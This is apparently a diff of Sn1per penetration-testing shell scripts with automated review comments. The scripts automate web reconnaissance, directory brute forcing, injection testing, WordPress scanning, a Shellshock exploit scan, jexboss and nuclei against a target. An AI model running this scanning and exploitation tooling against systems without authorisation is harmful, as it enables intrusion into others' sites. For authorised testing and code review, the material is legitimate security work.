mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
mkdir $WORKSPACE_DIR/vulnerabilities/ 2> /dev/null
mkdir $WORKSPACE_DIR/scans/ 2> /dev/null
fi
args="$args -m webscan --noreport --noloot"
TARGET="$a"
args="$args -t $TARGET"
if [[ ! -z "$WORKSPACE_DIR" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
else
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
fi
args=""
done
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
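Review bot: this mode creates `$WORKSPACE_DIR/vulnerabilities/` and `$WORKSPACE_DIR/scans/` that the other three mass modes do not, and like massweb it writes no `tasks.txt` entry, so the set of workspace directories and scan records now depends on which mass mode ran first; pick one directory list and one bookkeeping scheme for all four. As in the others, `$args` is built from an unquoted `for a in \`cat $FILE\`` line and passed unquoted to `sniper $args`, so any line in the target file containing whitespace or glob characters becomes extra arguments; read the file with `while read -r` and reject lines that are not a hostname, IP or CIDR before scanning. The "Finished" notification is again outside the `REPORT` check.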

1259
modes/normal.sh Normal file

File diff suppressed because it is too large

200
modes/normal_webporthttp.sh Normal file

@@ -0,0 +1,200 @@
wpif [[ "$MODE" = "web" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u http://$TARGET:80 -l 3 -v n
cp -f /usr/share/blackwidow/"$TARGET"_80/"$TARGET"_80-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null
#cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep 'http\:' | xargs -P $THREADS -r -n 1 -I '{}' injectx.py -u '{}' -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.txt
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "http\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "http\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-http.raw; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-http.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-http.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e $WEB_BRUTE_EXTENSIONS -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-common.txt
fi
fi
if [[ "$WEB_BRUTE_FULLSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-full.txt
fi
fi
if [[ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u http://$TARGET -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-exploits.txt
fi
fi
if [[ "$DIRSEARCH" == "1" ]]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
if [[ "$CLUSTERD" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
clusterd -i $TARGET 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http.txt
fi
if [[ "$CMSMAP" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cmsmap http://$TARGET | tee $LOOT_DIR/web/cmsmap-$TARGET-httpa.txt
echo ""
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-httpb.txt
echo ""
fi
if [[ "$WPSCAN" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$WP_API_KEY" ]]; then
wpscan --url http://$TARGET --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80a.raw
echo ""
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks --api-token $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80b.raw
echo ""
else
wpscan --url http://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80a.raw
echo ""
wpscan --url http://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port80b.raw
echo ""
fi
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port80a.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port80a.txt
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wpscan-$TARGET-http-port80b.raw 2> /dev/null > $LOOT_DIR/web/wpscan-$TARGET-http-port80b.txt
rm -f $LOOT_DIR/web/wpscan-$TARGET-http*.raw 2> /dev/null
fi
if [[ "$NIKTO" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port80.txt
fi
if [[ "$SHOCKER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80 | tee $LOOT_DIR/web/shocker-$TARGET-port80.txt
fi
if [[ "$JEXBOSS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd /tmp/
python3 /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET | tee $LOOT_DIR/web/jexboss-$TARGET-port80.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port80.raw > $LOOT_DIR/web/jexboss-$TARGET-port80.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port80.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [[ "$SMUGGLER" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port80.txt
fi
if [[ "$NUCLEI" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NUCLEI SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nuclei -silent -t /usr/share/sniper/plugins/nuclei-templates/ -c $THREADS -target http://$TARGET -o $LOOT_DIR/web/nuclei-http-10.0.0.19-port80.txt
fi
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per HTTP web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi
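Review bot: the nuclei call in this hunk writes to a hard-coded path, `-o $LOOT_DIR/web/nuclei-http-10.0.0.19-port80.txt`, so every target's HTTP nuclei results land in the same file and overwrite the previous scan; use `$TARGET` in the filename as the other tools here do (`nuclei-http-$TARGET-port80.txt`). Two smaller points in the same hunk: `[[ $(wc -c ... | awk '{print $1}') > 3 ]]` is a string comparison inside `[[ ]]`, so a 10-byte dirsearch-new file evaluates `"10" > "3"` as false and the change notification is skipped (`-gt` is the numeric test); and `sed -ir "s/</\&lh\;/g"` on the nikto output is `-i` with backup suffix `r`, which leaves a stray `nikto-$TARGET-http-port80.txtr` behind, while `&lh;` is not an HTML entity (`&lt;` is presumably intended).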


@@ -0,0 +1,196 @@
if [[ "$MODE" = "web" ]]; then
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$PASSIVE_SPIDER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u https://$TARGET:443 -l 3 -v n
cp -f /usr/share/blackwidow/"$TARGET"_443/"$TARGET"_443-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
if [[ "$INJECTX" == "1" ]]; then
rm -f $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null
for a in `cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep '?' | grep "https\:" | cut -d '?' -f2 | cut -d '=' -f1 | sort -u`; do for b in `grep $a $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "https\:" | head -n 1`; do injectx.py -u $b -vy | tee -a $LOOT_DIR/web/injectx-$TARGET-https.raw; done; done;
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/injectx-$TARGET-https.raw 2> /dev/null > $LOOT_DIR/web/injectx-$TARGET-https.txt
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
if [[ "$WEB_BRUTE_COMMONSCAN" == "1" ]]; then
